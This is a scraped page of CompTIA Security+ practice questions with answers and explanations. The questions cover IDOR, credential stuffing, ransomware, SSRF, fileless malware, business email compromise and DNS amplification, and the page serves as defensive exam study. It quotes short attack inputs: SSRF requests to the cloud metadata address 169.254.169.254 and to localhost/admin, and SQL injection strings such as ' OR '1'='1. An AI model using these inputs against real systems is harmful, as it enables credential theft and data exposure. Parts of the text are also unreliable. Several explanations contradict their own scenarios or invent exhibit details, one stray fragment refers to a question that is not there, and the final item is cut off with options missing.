` into a public forum signature field. Later, other users who view that…","url":"https://courseiva.com/questions/comptia/security-plus/a-customer-enters-alert-test-into-a-public-forum-signature-field"},{"@type":"ListItem","position":53,"name":"An employee receives an email that appears to come from payroll and asks them to open a link to \"confirm direct deposit …","url":"https://courseiva.com/questions/comptia/security-plus/an-employee-receives-an-email-that-appears-to-come-from-payroll"},{"@type":"ListItem","position":54,"name":"A help desk technician receives an email that appears to come from the payroll provider. The message says the employee's…","url":"https://courseiva.com/questions/comptia/security-plus/a-help-desk-technician-receives-an-email-that-appears-to-come"},{"@type":"ListItem","position":55,"name":"Based on the exhibit, which indicator should defenders prioritize for detecting future activity from this campaign?","url":"https://courseiva.com/questions/comptia/security-plus/based-on-the-exhibit-which-indicator-should-defenders-prioritize"},{"@type":"ListItem","position":56,"name":"Users on the same VLAN report that their browser occasionally reaches a fake internal portal, and packet captures show o…","url":"https://courseiva.com/questions/comptia/security-plus/users-on-the-same-vlan-report-that-their-browser-occasionally"},{"@type":"ListItem","position":57,"name":"An accounts payable specialist receives a reply inside an existing vendor email thread. The message uses the real invoic…","url":"https://courseiva.com/questions/comptia/security-plus/an-accounts-payable-specialist-receives-a-reply-inside-an"},{"@type":"ListItem","position":58,"name":"A scan reports a critical remote code execution vulnerability on an internet-facing VPN appliance with public proof-of-c…","url":"https://courseiva.com/questions/comptia/security-plus/a-scan-reports-a-critical-remote-code-execution-vulnerability-on"},{"@type":"ListItem","position":59,"name":"A developer reports that a search field returns all customer records when they enter a single quote followed by OR 1=1. …","url":"https://courseiva.com/questions/comptia/security-plus/a-search-field-returns-all-customer-records-when-they-enter-a"},{"@type":"ListItem","position":60,"name":"A VPN concentrator shows that an authentication request from a user was accepted twice, even though the user insists the…","url":"https://courseiva.com/questions/comptia/security-plus/a-vpn-concentrator-shows-that-an-authentication-request-from-a"},{"@type":"ListItem","position":61,"name":"A SOC analyst reviews an EDR alert on a finance workstation. The alert shows powershell.exe launched with an encoded com…","url":"https://courseiva.com/questions/comptia/security-plus/a-soc-analyst-reviews-an-edr-alert-on-a-finance-workstation-the"},{"@type":"ListItem","position":62,"name":"A user's laptop suddenly starts renaming many files and showing a ransom note. The laptop is still connected to Wi-Fi. W…","url":"https://courseiva.com/questions/comptia/security-plus/a-user-s-laptop-suddenly-starts-renaming-many-files-and-showing"},{"@type":"ListItem","position":63,"name":"A security analyst is reviewing the source code of a custom web application. The application receives JSON data from use…","url":"https://courseiva.com/questions/comptia/security-plus/a-security-analyst-is-reviewing-the-source-code-of-a-custom-web"},{"@type":"ListItem","position":64,"name":"A remote user's laptop begins launching a legitimate-looking \"System Update\" application at login. After the update wind…","url":"https://courseiva.com/questions/comptia/security-plus/a-remote-user-s-laptop-begins-launching-a-legitimate-looking"},{"@type":"ListItem","position":65,"name":"Based on the exhibit, what is the BEST remediation for the application flaw shown?\r\n\r\nA user-controlled parameter is bei…","url":"https://courseiva.com/questions/comptia/security-plus/based-on-the-exhibit-what-is-the-best-remediation-for-the"},{"@type":"ListItem","position":66,"name":"A customer portal has a form that submits a money-transfer request with the user’s existing session cookie. Security tes…","url":"https://courseiva.com/questions/comptia/security-plus/a-customer-portal-has-a-form-that-submits-a-money-transfer"},{"@type":"ListItem","position":67,"name":"NetFlow shows one workstation opening SMB connections to a dozen internal servers and then attempting many WinRM connect…","url":"https://courseiva.com/questions/comptia/security-plus/netflow-shows-one-workstation-opening-smb-connections-to-a-dozen"},{"@type":"ListItem","position":68,"name":"A vulnerability scan of a Linux application server reports these findings: OpenSSL 3.0.7 is flagged with a critical CVE,…","url":"https://courseiva.com/questions/comptia/security-plus/a-vulnerability-scan-of-a-linux-application-server-reports-these"},{"@type":"ListItem","position":69,"name":"A help desk technician reviews a voicemail in which the caller claims to be from the security team, says the user will b…","url":"https://courseiva.com/questions/comptia/security-plus/a-help-desk-technician-reviews-a-voicemail-in-which-the-caller"},{"@type":"ListItem","position":70,"name":"An employee receives an email that appears to come from the HR team. It says their payroll account will be suspended unl…","url":"https://courseiva.com/questions/comptia/security-plus/an-employee-receives-an-email-that-appears-to-come-from-the-hr"},{"@type":"ListItem","position":71,"name":"A user reports receiving repeated MFA push requests even though they are not logging in. Later, someone calls and claims…","url":"https://courseiva.com/questions/comptia/security-plus/repeated-mfa-push-requests-even-though-they-are-not-logging-in"},{"@type":"ListItem","position":72,"name":"During testing, a login form returns all user records when the tester enters ' OR '1'='1 in a username field. What is th…","url":"https://courseiva.com/questions/comptia/security-plus/during-testing-a-login-form-returns-all-user-records-when-the"},{"@type":"ListItem","position":73,"name":"A file server suddenly renames documents, creates ransom notes, and users can no longer open their files. Which malware …","url":"https://courseiva.com/questions/comptia/security-plus/a-file-server-suddenly-renames-documents-creates-ransom-notes"},{"@type":"ListItem","position":74,"name":"An EDR console shows PowerShell launching from a scheduled task, decoding a command from memory, and spawning rundll32.e…","url":"https://courseiva.com/questions/comptia/security-plus/an-edr-console-shows-powershell-launching-from-a-scheduled-task"},{"@type":"ListItem","position":75,"name":"After a suspected compromise, a server's local tools report sshd listening on port 22, but netstat and the EDR console f…","url":"https://courseiva.com/questions/comptia/security-plus/after-a-suspected-compromise-a-server-s-local-tools-report-sshd"}]}
Based on the exhibit, what is the BEST fix for the vulnerability being exploited?
A user with a standard account can retrieve documents by changing the `docId` value in the request. The application returns another employee's file without any authorization error.
A.Add client-side JavaScript to hide document IDs from the user interface.
B.Enforce server-side object-level authorization checks before returning any document.
C.Require users to change passwords more frequently to prevent unauthorized document access.
D.Place the document server behind a load balancer to prevent direct access to the application.
AnswerB
The application is returning objects to an authenticated user without verifying whether that user is allowed to access each specific record.
Why this answer
The vulnerability is an Insecure Direct Object Reference (IDOR), where the application trusts user-supplied input (the `docId` parameter) without verifying that the authenticated user is authorized to access the requested document. The best fix is to enforce server-side object-level authorization checks before returning any document, ensuring that the server validates the user's permissions against the specific resource ID before processing the request.
Exam trap
The trap here is that candidates may confuse client-side hiding (option A) with a valid security control, but the SY0-701 exam emphasizes that all access control must be enforced server-side, as client-side controls are trivially bypassed.
How to eliminate wrong answers
Option A is wrong because client-side JavaScript hiding of document IDs is security by obscurity and can be easily bypassed by inspecting network traffic or modifying requests with tools like Burp Suite; it does not prevent direct manipulation of the `docId` parameter. Option C is wrong because requiring more frequent password changes addresses credential management, not authorization flaws; it does not prevent an authenticated user from accessing unauthorized documents via IDOR. Option D is wrong because placing the document server behind a load balancer only distributes traffic and does not enforce any authorization checks; it does not mitigate the underlying issue of missing access controls on individual objects.
A security analyst reviews authentication logs and notices multiple failed login attempts using various usernames from a single IP address over several hours. Eventually, a successful login occurs using a username that had many failed attempts. The organization requires multi-factor authentication (MFA). Which type of attack is most likely indicated by this pattern?
A.Credential stuffing
B.Brute-force attack
C.Password spraying
D.Shoulder surfing
AnswerA
Correct. Credential stuffing leverages lists of known username/password pairs from previous breaches. The analyst observed many failed attempts from one source IP, then a successful login, which matches an attacker testing stolen credentials. Even with MFA, the attack may succeed if the attacker has obtained session tokens or uses other techniques.
Why this answer
The pattern of multiple failed login attempts using various usernames from a single IP address, followed by a successful login for a username that had many failed attempts, is characteristic of a credential stuffing attack. In this attack, the adversary uses a list of previously compromised username/password pairs (often obtained from data breaches) and attempts them against the target system. The successful login indicates that the attacker found a valid credential pair, which bypasses the MFA requirement only if the attacker also has access to the second factor (e.g., via a phishing or session hijacking attack), but the log pattern itself points to credential stuffing.
Exam trap
The trap here is confusing credential stuffing with password spraying: candidates often pick password spraying because it also uses multiple usernames, but the key differentiator is that credential stuffing uses many attempts per username (as seen in the logs), while password spraying uses one common password per username with long delays between attempts.
How to eliminate wrong answers
Option B (Brute-force attack) is wrong because a brute-force attack typically targets a single username with many password guesses, not multiple usernames from a single IP. Option C (Password spraying) is wrong because password spraying uses a single common password against many usernames, not multiple failed attempts per username followed by a success; the pattern here shows many attempts per username, which is the opposite of spraying's low-and-slow approach.
A help desk technician receives a call from a user who says many of their documents now have strange file extensions and a ransom note appeared on the desktop. The files will not open. What type of malware is the user most likely experiencing?
A.Spyware that silently records user activity over time
B.Ransomware that encrypts files and demands payment for recovery
C.A worm that spreads mainly by scanning for other hosts
D.A rootkit that hides malicious processes from the operating system
AnswerB
Ransomware commonly encrypts a victim's files and displays a demand for payment to restore access.
Why this answer
The user's symptoms—unopenable files with strange extensions and a ransom note—are classic indicators of ransomware. Ransomware encrypts files using a symmetric key (e.g., AES-256) and then demands payment, typically in cryptocurrency, to provide the decryption key. This matches the scenario exactly, as the files are rendered inaccessible and a note is left behind.
Exam trap
The trap here is that candidates may confuse ransomware with a worm because both can spread rapidly, but the key differentiator is the encryption of files and the presence of a ransom demand, which is unique to ransomware.
How to eliminate wrong answers
Option A is wrong because spyware focuses on covert data collection (e.g., keystroke logging, screen captures) and does not alter file extensions or display ransom notes; it operates silently to avoid detection. Option C is wrong because a worm self-replicates across networks by exploiting vulnerabilities (e.g., SMB EternalBlue) or scanning for open ports, but it does not specifically target user documents with encryption or leave a ransom note on the desktop.
A cloud-hosted image-processing API accepts a URL parameter so it can download a picture and generate a thumbnail. Logs show a user submitting `http://169.254.169.254/latest/meta-data/` and receiving instance credentials in the response. Which attack is being used?
A.Cross-site scripting (XSS)
B.Server-side request forgery (SSRF)
C.Cross-site request forgery (CSRF)
D.SQL injection
AnswerB
SSRF tricks the server into making an internal request to a sensitive resource on the attacker’s behalf.
Why this answer
The attack is Server-Side Request Forgery (SSRF) because the cloud-hosted API is tricked into making a request to the internal metadata service at the link-local address 169.254.169.254. This endpoint is only accessible from within the cloud provider's network and exposes instance credentials, which the attacker then receives in the response. SSRF exploits the server's ability to make outbound requests to internal or restricted resources.
Exam trap
The trap here is that candidates may confuse SSRF with CSRF because both involve 'forgery' and server requests, but SSRF originates from the server itself, while CSRF originates from a user's browser under the attacker's control.
How to eliminate wrong answers
Option A is wrong because Cross-Site Scripting (XSS) involves injecting malicious scripts into web pages viewed by other users, not manipulating server-side requests to internal IPs. Option C is wrong because Cross-Site Request Forgery (CSRF) tricks an authenticated user's browser into performing unintended actions on a trusted site, not exploiting a server to fetch internal resources. Option D is wrong because SQL injection targets database queries through input fields, not HTTP requests to cloud metadata endpoints.
Based on the exhibit, what type of threat is the security team most likely seeing on the workstation?
A.Trojan
B.Fileless malware
C.Worm
D.Rootkit
AnswerB
The alert shows PowerShell launching with encoded commands, hidden execution, and no suspicious file written to disk. That behavior strongly suggests fileless malware, which relies on built-in tools and memory rather than dropping a traditional executable. The registry change also indicates persistence without a visible file-based payload.
Why this answer
The security team is most likely seeing fileless malware because the exhibit shows a PowerShell command that injects malicious code directly into memory (e.g., using Invoke-Mimikatz or a reflective DLL injection technique) without writing a persistent executable to disk. Fileless malware operates in-memory, leveraging legitimate system tools like PowerShell, WMI, or .NET to evade traditional signature-based antivirus detection, which matches the scenario described.
Exam trap
The trap here is that candidates often confuse fileless malware with a Trojan because both can use PowerShell, but the key distinction is that fileless malware avoids writing to disk, while a Trojan relies on a dropped executable file.
How to eliminate wrong answers
Option A is wrong because a Trojan is a malicious program disguised as legitimate software that typically writes itself to disk and requires user execution, whereas the exhibit shows code running in memory without a persistent file. Option C is wrong because a worm is a self-replicating malware that spreads across networks by exploiting vulnerabilities, not by executing in-memory scripts on a single workstation. Option D is wrong because a rootkit is designed to hide its presence and maintain privileged access by modifying the operating system kernel or boot process, not by running transient in-memory scripts via PowerShell.
A support agent notices that changing `invoiceId=8842` to `invoiceId=8843` in a portal URL returns another customer's invoice PDF without any additional login prompt. The user is already authenticated to the application. Which vulnerability is most likely present?
A.Cross-site scripting
B.Broken access control
C.SQL injection
D.Cross-site request forgery
AnswerB
Broken access control occurs when the application fails to properly verify whether an authenticated user is allowed to access a specific object or resource. Changing the invoice ID reveals that authorization is missing or weak.
Why this answer
The vulnerability is broken access control (B) because the application fails to verify that the authenticated user is authorized to access the resource identified by `invoiceId=8843`. By simply changing a numeric parameter in the URL, the user can view another customer's invoice PDF without any additional authentication or authorization check. This is a classic insecure direct object reference (IDOR) flaw, which falls under the broader category of broken access control.
Exam trap
The trap here is that candidates often confuse IDOR with SQL injection because both involve manipulating input parameters, but IDOR is about missing authorization checks, not database query injection.
How to eliminate wrong answers
Option A is wrong because cross-site scripting (XSS) involves injecting malicious scripts into web pages viewed by other users, not manipulating URL parameters to access unauthorized resources. Option C is wrong because SQL injection requires the attacker to inject SQL commands into input fields to manipulate the database, whereas here the parameter change directly accesses a different resource without any database manipulation. Option D is wrong because cross-site request forgery (CSRF) tricks an authenticated user into performing unintended actions on a web application, but the scenario describes the user directly changing a URL parameter, not being tricked into submitting a forged request.
After a user installs a free PDF converter from an unofficial site, the browser homepage changes, the endpoint protection agent stops launching, and the system begins making periodic outbound connections to the same unfamiliar IP address. No exploit was used during installation, and the installer appeared legitimate. What type of malware best matches this behavior?
A.Worm, because the infection is spreading automatically across the network.
B.Trojan, because it masquerades as useful software while delivering hidden malicious functionality.
C.Rootkit, because the attacker must have hidden files in the kernel.
D.Spyware, because the main symptom is that the browser homepage changed.
AnswerB
A trojan is designed to look legitimate so users willingly install it, which matches the fake PDF converter. The changed homepage, disabled security tool, and recurring outbound connections are classic signs that the program is not behaving like the advertised utility. Trojans often install additional payloads, create persistence, or open remote access without the user realizing the original software was malicious.
Why this answer
B is correct because the software masquerades as a legitimate PDF converter while secretly performing malicious actions—changing the browser homepage, disabling endpoint protection, and making unauthorized outbound connections. This is the classic definition of a Trojan horse: it appears useful but contains hidden, harmful functionality. The lack of an exploit and the user's voluntary installation further confirm it is a Trojan, not a self-replicating worm or a kernel-hiding rootkit.
Exam trap
The trap here is that candidates may confuse a Trojan with a worm because both can cause network activity, but the key differentiator is that a worm spreads autonomously without user action, whereas a Trojan requires the user to intentionally run the malicious file.
How to eliminate wrong answers
Option A is wrong because a worm self-replicates and spreads automatically across a network without user interaction, whereas this infection required the user to manually install the software. Option C is wrong because a rootkit specifically hides its presence by modifying kernel-level structures (e.g., hooking system calls or hiding processes/files), but the described symptoms—homepage change, disabled endpoint protection, and outbound connections—do not indicate kernel-level concealment. Option D is wrong because spyware primarily focuses on covert data collection (e.g., keystrokes, browsing habits), and while a changed homepage can be a side effect, the core behavior here includes disabling security software and establishing persistent C2 connections, which is more characteristic of a Trojan.
A vulnerability scan finds a critical flaw on an internet-facing SFTP gateway with public exploit code, and a high-severity flaw on an internal lab server that is only reachable from a restricted subnet. Which should be remediated first?
A.The internal lab server, because every high-severity finding should be fixed first.
B.The internet-facing SFTP gateway, because it has higher immediate risk.
C.Both systems can wait until the next scheduled maintenance window.
D.Neither system needs urgent action because the lab server is isolated.
AnswerB
Public exposure and known exploit code make the gateway the more urgent business risk.
Why this answer
The internet-facing SFTP gateway has a critical vulnerability with public exploit code, meaning it is exposed to the entire internet and can be directly attacked without any network restrictions. This creates an immediate and high-likelihood risk of remote code execution or data breach, whereas the internal lab server is isolated to a restricted subnet, significantly reducing its attack surface and exploitability. Remediation priority should be based on risk severity (likelihood × impact), not just CVSS score, making the SFTP gateway the correct first choice.
Exam trap
The trap here is that candidates fixate on the CVSS severity score (high vs. critical) without factoring in exposure, exploitability, and network segmentation, leading them to incorrectly prioritize the internal server over the internet-facing gateway.
How to eliminate wrong answers
Option A is wrong because it incorrectly assumes that all high-severity findings should be fixed first regardless of exposure; in reality, a critical flaw on an internet-facing system with public exploit code poses far greater immediate risk than a high-severity flaw on an isolated internal server. Option C is wrong because delaying remediation for a critical, internet-exposed vulnerability with known exploit code until the next scheduled maintenance window is unacceptable; such flaws require immediate action to prevent likely compromise.
A help desk technician receives a phone call from someone who claims to be the CFO. The caller says they are traveling, cannot access their MFA app, and needs the technician to reset the account immediately. They also ask the technician to read back the one-time code sent to the executive's phone so they can "verify identity." What type of attack is this most likely?
A.Pretexting
B.Vishing
C.Smishing
D.Baiting
AnswerB
Vishing is voice-based phishing, and this attack uses a phone call to pressure the technician.
Why this answer
This is vishing (voice phishing) because the attacker uses a phone call to impersonate a trusted executive (the CFO) and manipulates the technician into bypassing MFA controls. The request to read back the one-time code is a classic social engineering tactic to capture a valid OTP, which the attacker can then use to authenticate as the CFO.
Exam trap
The trap here is that candidates may confuse vishing with pretexting, but vishing is the specific attack vector (voice call) while pretexting is the broader deception technique—the question asks for the type of attack, which is vishing.
How to eliminate wrong answers
Option A is wrong because pretexting is a broader category of fabricating a scenario to obtain information, but vishing is the specific delivery method (voice call) used here. Option C is wrong because smishing uses SMS/text messages, not a phone call. Option D is wrong because baiting involves offering something enticing (like a free USB drive) to trick a victim, not impersonating an authority figure over the phone.
Based on the exhibit, which social engineering attack is most likely?
A.Phishing, because the message is a broad email that tries to trick the recipient.
B.Spear phishing, because the email is tailored to a specific employee and business context.
C.Vishing, because the attacker is using a phone call to pressure the victim.
D.Baiting, because the attacker is offering a document that the user wants to open.
AnswerB
This is spear phishing because the message is customized for a particular recipient and business process. It references an internal project, uses an invoice theme, and pressures the target to change payment details quickly. That combination of personalization and urgency is designed to increase trust and bypass normal caution.
Why this answer
Option B is correct because spear phishing involves crafting a message that is personalized to a specific individual or role within an organization, often referencing internal processes or names to increase credibility. In the exhibit, the email is addressed to a specific employee and mentions a legitimate-sounding business context (e.g., an internal document or procedure), which is the hallmark of spear phishing rather than a generic blast.
Exam trap
CompTIA often tests the distinction between generic phishing and spear phishing by including a message that appears personalized but still uses broad language, so candidates must look for specific contextual clues like the recipient's name or internal references to identify the targeted nature.
How to eliminate wrong answers
Option A is wrong because phishing typically refers to a mass, untargeted email sent to many recipients, whereas the exhibit shows a message tailored to a specific employee and business context. Option C is wrong because vishing (voice phishing) uses a phone call, not an email, to pressure the victim; the exhibit shows an email message. Option D is wrong because baiting involves offering an enticing item (e.g., a free USB drive or download) to trick the user, not a personalized email requesting action.
A security analyst is reviewing the session management implementation of a web application. The application generates session tokens by computing the MD5 hash of the concatenation of the username and the current server timestamp rounded to the nearest hour. An attacker has obtained a valid session token for her own account and discovers that she can forge tokens for other users by simply substituting the username in the hash calculation with a known target username. Which type of attack is the web application most vulnerable to?
A.Session hijacking via cross-site scripting (XSS)
B.Session replay attack
C.Session prediction
D.Session fixation
AnswerC
The session token is generated using the username and a timestamp with low granularity, making it possible for an attacker who knows the algorithm to calculate valid tokens for any user. This is a classic session prediction vulnerability.
Why this answer
The session token is generated using MD5(username + timestamp rounded to the nearest hour). Since the attacker knows her own token and can compute the hash for any username with the same timestamp, she can predict tokens for other users. This is a classic session prediction vulnerability, as the token generation lacks sufficient entropy and relies on predictable inputs.
Exam trap
The trap here is confusing session prediction with session hijacking via XSS or session replay, but the key clue is that the attacker can compute the token herself by substituting the username, which directly indicates a predictable token generation scheme.
How to eliminate wrong answers
Option A is wrong because cross-site scripting (XSS) involves injecting malicious scripts into a web page to steal session tokens, but here the attacker already has a valid token and can forge tokens without needing to execute scripts in another user's browser. Option B is wrong because a session replay attack involves capturing and reusing a valid session token, but the attacker is not replaying a captured token; she is forging new tokens by altering the username in the hash calculation. Option D is wrong because session fixation requires the attacker to set a known session ID for the victim (e.g., via a link or cookie injection), but here the attacker is generating tokens independently, not fixing a session ID for the victim.
A cloud-hosted application allows users to submit a URL for image processing. Logs show repeated requests such as `http://169.254.169.254/latest/meta-data/` and `http://localhost/admin`. The server is making outbound requests on behalf of the user input. What is the best defensive control to implement?
A.Allow any URL that returns a valid HTTP status code
B.Use a strict allowlist for outbound destinations and block link-local metadata addresses
C.Escape all quotation marks before sending the request
D.Require users to change their passwords after each upload
AnswerB
This is the best defense because the application is making server-side requests based on user input. A strict allowlist limits which external destinations the service may reach, and blocking link-local or internal addresses prevents access to sensitive metadata services and localhost resources. This directly reduces the risk of server-side request forgery in cloud environments.
Why this answer
The requests target the AWS EC2 instance metadata service (169.254.169.254) and localhost, which are classic Server-Side Request Forgery (SSRF) attacks. By using a strict allowlist for outbound destinations and explicitly blocking link-local metadata addresses, the application prevents the server from making unauthorized requests to internal or cloud metadata endpoints, thereby mitigating SSRF.
Exam trap
The trap here is that candidates may confuse SSRF with injection attacks and choose a sanitization option like escaping quotation marks, but the real vulnerability is the server's ability to make outbound requests to arbitrary destinations, which requires network-level controls.
How to eliminate wrong answers
Option A is wrong because allowing any URL that returns a valid HTTP status code would permit SSRF attacks, as attackers can craft URLs that reach internal services (e.g., metadata endpoints) that respond with a valid status. Option C is wrong because escaping quotation marks is a defense against injection attacks like SQL injection or XSS, but it does not prevent the server from making outbound requests to arbitrary destinations, which is the core issue in SSRF.
Parameterized queries and prepared statements are effective because they separate SQL logic from user input, ensuring that input is treated as data rather than executable code. This prevents attackers from injecting malicious SQL commands into query strings, as the database engine compiles the query structure before parameters are bound.
Exam trap
The trap here is that all four options are correct, so candidates must recognize that the question expects them to select all four, rather than being misled into thinking one is incorrect due to common misconceptions about input validation being insufficient alone.
A CFO at a mid-sized company receives an urgent email that appears to come from the CEO's email address, requesting an immediate wire transfer of $50,000 to a new vendor for a time-sensitive project. The email address displayed is 'ceo@cornpany.com' instead of the legitimate 'ceo@company.com'. The CFO follows the instruction and initiates the transfer. Later, the real CEO denies sending such a request. Which of the following security controls would have been MOST effective in preventing this type of attack from succeeding?
A.Deploying a stronger email spam filter that blocks all emails from unrecognized domains
B.Requiring multi-factor authentication (MFA) for all corporate email accounts
C.Implementing a policy that all financial transfers over a certain threshold must be verbally verified via a known phone number before execution
D.Enabling Transport Layer Security (TLS) encryption for all outgoing email communications
AnswerC
An out-of-band verification procedure, such as calling the requester on a known phone number, directly addresses the impersonation risk by confirming the request through an independent communication channel.
Why this answer
Option C is correct because the attack is a business email compromise (BEC) using a lookalike domain. A policy requiring verbal verification via a known phone number adds a human out-of-band check that bypasses the email channel entirely, preventing the fraudulent transfer even if the email appears legitimate. This control directly addresses the social engineering aspect of the attack, which technical controls alone cannot fully mitigate.
Exam trap
The trap here is that candidates often choose a technical control like MFA or spam filters, overlooking that the attack exploits human trust and domain spoofing rather than account compromise, so the most effective control is a procedural one that bypasses the email channel entirely.
How to eliminate wrong answers
Option A is wrong because a stronger spam filter would not block the email if the lookalike domain 'cornpany.com' is a registered domain that passes SPF/DKIM checks; the filter would only block unrecognized domains if explicitly configured, but attackers often use domains that appear similar to trusted ones. Option B is wrong because MFA protects against credential theft or unauthorized access to email accounts, but in this scenario the attacker spoofed the CEO's email address without compromising the account, so MFA does not prevent the spoofed email from being sent or received. Option D is wrong because TLS encryption secures the communication channel between mail servers, preventing eavesdropping or tampering in transit, but it does not authenticate the sender's identity or prevent spoofed emails from being delivered.
A file server used by a shared service account begins renaming documents, deleting shadow copies, and creating outbound SMB connections to many internal hosts. The SOC suspects the malware may be spreading while also encrypting data. Which two actions are the best immediate containment steps? Select two.
Select 2 answers
A.Isolate the affected server from the network through EDR or switch controls.
B.Disable or reset the compromised service account and revoke active sessions.
C.Restore the server from backup before taking any containment action.
D.Delete the suspicious files from the server to stop the encryption process.
E.Inform users that the incident is likely a false positive and continue monitoring.
AnswersA, B
Isolation is the fastest way to stop further encryption and prevent the suspected spread from reaching more systems. When a server is actively affecting files and reaching out to other hosts, limiting its network access is the most effective containment measure available immediately.
Why this answer
Isolating the affected server from the network via EDR or switch controls is correct because it immediately stops the malware from spreading to other hosts through SMB connections and prevents further encryption of network-accessible files. This containment step breaks the lateral movement and data exfiltration channels without relying on potentially compromised credentials or incomplete cleanup.
Exam trap
The trap here is that candidates may think deleting files or restoring from backup is an immediate containment step, but in reality, containment must first stop the active threat (network isolation and credential revocation) before any recovery actions are taken.
A workstation suddenly begins making SMB connections to many internal servers within a few minutes. What is the best immediate response?
A.Allow the traffic because SMB is a normal file-sharing protocol.
B.Isolate the workstation from the network for containment.
C.Delete the local event logs to reduce alert noise.
D.Disable all SMB services on every server immediately.
AnswerB
Network isolation limits possible lateral movement and helps stop a compromised host from touching additional systems while the event is investigated.
Why this answer
Option B is correct because the workstation's sudden SMB connections to many internal servers strongly indicate compromise, such as ransomware or worm propagation. Isolating the workstation immediately contains the threat, preventing lateral movement and further damage while preserving forensic evidence.
Exam trap
The trap here is that candidates may think SMB traffic is always benign because it is a legitimate protocol, failing to recognize that a sudden spike in SMB connections to multiple internal servers is a red flag for active lateral movement.
How to eliminate wrong answers
Option A is wrong because allowing the traffic ignores the anomalous behavior; SMB is normal for file sharing, but a sudden burst of connections to many servers is a classic sign of automated malicious activity like ransomware encryption or worm spread. Option C is wrong because deleting event logs destroys critical forensic evidence needed to investigate the incident, and it does not stop the malicious activity. Option D is wrong because disabling all SMB services on every server is an overly drastic, disruptive response that would break legitimate business operations and is not a targeted containment step.
A vulnerability scan finds a critical flaw on an internet-facing VPN appliance and says public exploit code is already available. Which issue should be remediated first?
A.A low-severity finding on an internal test server with no network access
B.A critical flaw on an internet-facing VPN appliance with known exploit code
C.A cosmetic configuration warning on a printer management interface
D.A medium-severity issue on a device that is powered off and not in service
AnswerB
This finding is both severe and exposed, which makes exploitation much more likely and business impact potentially high.
Why this answer
The critical flaw on an internet-facing VPN appliance with known public exploit code represents the highest risk because it combines a severe vulnerability, direct exposure to the internet, and immediate weaponization potential. VPN appliances are common attack vectors for initial access, and an exploit in the wild means attackers can compromise the device without advanced skills, leading to potential network breach and lateral movement.
Exam trap
The trap here is that candidates may prioritize by severity alone without factoring in exploitability, exposure, or asset criticality—leading them to choose a medium or low finding that is technically less urgent but appears more manageable.
How to eliminate wrong answers
Option A is wrong because a low-severity finding on an internal test server with no network access poses negligible risk—it is isolated and lacks connectivity, so exploitation is practically impossible. Option C is wrong because a cosmetic configuration warning on a printer management interface is not a security vulnerability; it is a non-functional issue that does not affect confidentiality, integrity, or availability. Option D is wrong because a medium-severity issue on a device that is powered off and not in service cannot be exploited—the device is not operational, so the finding has zero current risk.
EDR on a workstation shows winword.exe spawning powershell.exe with hidden, no-profile, and encoded arguments. No new executable is written to disk. Minutes later, a scheduled task creation is blocked, but the same host continues making HTTPS requests to a cloud IP address. Which malware category best fits this behavior?
A.Trojan, because the malicious activity likely started from a user-opening event.
B.Worm, because the host is making repeated outbound network connections.
C.Rootkit, because the process is using hidden commands and network connections.
D.Fileless attack, because the payload is executed in memory using legitimate scripting tools and leaves little on disk.
AnswerD
Fileless attack is the best fit because the sequence uses trusted built-in tools, encoded PowerShell, and no obvious executable drop on disk. The suspicious behavior happens in memory and through script interpretation, which makes detection harder than with traditional malware files. The blocked scheduled task and later HTTPS beaconing are consistent with in-memory execution and persistence attempts after initial delivery.
Why this answer
The correct answer is D because the attack uses legitimate tools (winword.exe spawning powershell.exe) with hidden, no-profile, and encoded arguments to execute a payload entirely in memory, never writing a new executable to disk. This is the hallmark of a fileless attack, which relies on in-memory execution and living-off-the-land binaries (LOLBins) to evade traditional antivirus and disk-based detection. The subsequent scheduled task creation block and persistent HTTPS connections to a cloud IP further indicate a fileless malware that establishes command-and-control (C2) without dropping files.
Exam trap
The trap here is that candidates see 'hidden commands' and 'network connections' and incorrectly associate them with a rootkit, but the 'hidden' refers to PowerShell's `-WindowStyle Hidden` parameter, not kernel-level hiding, and the network connections are standard HTTPS C2 traffic, not a rootkit's stealthy communication.
How to eliminate wrong answers
Option A is wrong because a Trojan typically requires a user to execute a malicious file that is written to disk, but here no new executable is written to disk and the activity starts from a legitimate Office process spawning PowerShell in memory. Option B is wrong because a Worm self-replicates and spreads automatically across networks, often exploiting vulnerabilities; the repeated outbound HTTPS connections here are for C2 communication, not for self-propagation. Option C is wrong because a Rootkit is designed to hide its presence by modifying the operating system kernel or drivers, whereas this attack uses hidden PowerShell arguments (a command-line flag) and does not involve kernel-level concealment or driver installation.
A file server suddenly renames documents with a new extension and displays a note demanding payment in cryptocurrency to restore access. What type of malware is most likely involved?
A.Ransomware
B.Spyware
C.Worm
D.Rootkit
AnswerA
This is the classic symptom pattern for ransomware. Files are renamed or encrypted, access is disrupted, and the attacker demands payment for recovery. The ransom note and the sudden file changes together make ransomware the best answer.
Why this answer
Ransomware is designed to encrypt files on a system, making them inaccessible, and then demand a ransom—typically in cryptocurrency—to restore access. The sudden renaming of documents with a new extension is a hallmark of ransomware encryption, as it appends a custom extension to indicate the files have been locked. The displayed note demanding payment confirms the extortion motive, which is unique to ransomware among the given options.
Exam trap
The trap here is that candidates may confuse ransomware with other malware types that alter files or display messages, but only ransomware specifically encrypts files and demands a ransom for decryption.
How to eliminate wrong answers
Option B (Spyware) is wrong because spyware is designed to covertly monitor user activity and collect sensitive information, not to encrypt or rename files or demand ransom. Option C (Worm) is wrong because a worm is a self-replicating malware that spreads across networks without requiring user interaction, and it typically does not encrypt files or display ransom notes. Option D (Rootkit) is wrong because a rootkit is a type of malware that hides its presence and provides persistent privileged access to a system, but it does not perform file encryption or extortion.
A public web server becomes unreachable during an outage. Netflow shows a large number of DNS responses arriving from many open resolvers, while the server itself only sent tiny spoofed DNS queries with the victim's address as the source. What type of attack is this?
A.DNS zone transfer abuse against the organization.
This is DNS amplification reflection because the attacker spoofs the victim's IP address in small requests to open resolvers, causing large responses to be sent to the victim instead. The result is a bandwidth flood that can make the server unreachable even though the victim never initiated the traffic. The key clues are tiny queries, spoofed source addresses, many resolvers, and a high volume of unsolicited responses. This is a classic distributed denial-of-service pattern.
Why this answer
This is a classic DNS amplification reflection DDoS attack. The attacker sends small DNS queries with a spoofed source IP (the victim's address) to open resolvers, which then send large DNS responses to the victim, overwhelming its bandwidth. The NetFlow data shows the server receiving many large DNS responses while only sending tiny spoofed queries, confirming the amplification and reflection vectors.
Exam trap
The trap here is confusing the direction of traffic: candidates may think the server is the attacker because it sends queries, but the spoofed source IP and large incoming responses reveal it is the victim of a reflection attack.
How to eliminate wrong answers
Option A is wrong because DNS zone transfer abuse involves an unauthorized request for a full zone file from a DNS server, not a flood of responses from open resolvers. Option C is wrong because a replay attack captures and retransmits a valid session token to impersonate a user, which does not involve DNS traffic or bandwidth exhaustion.
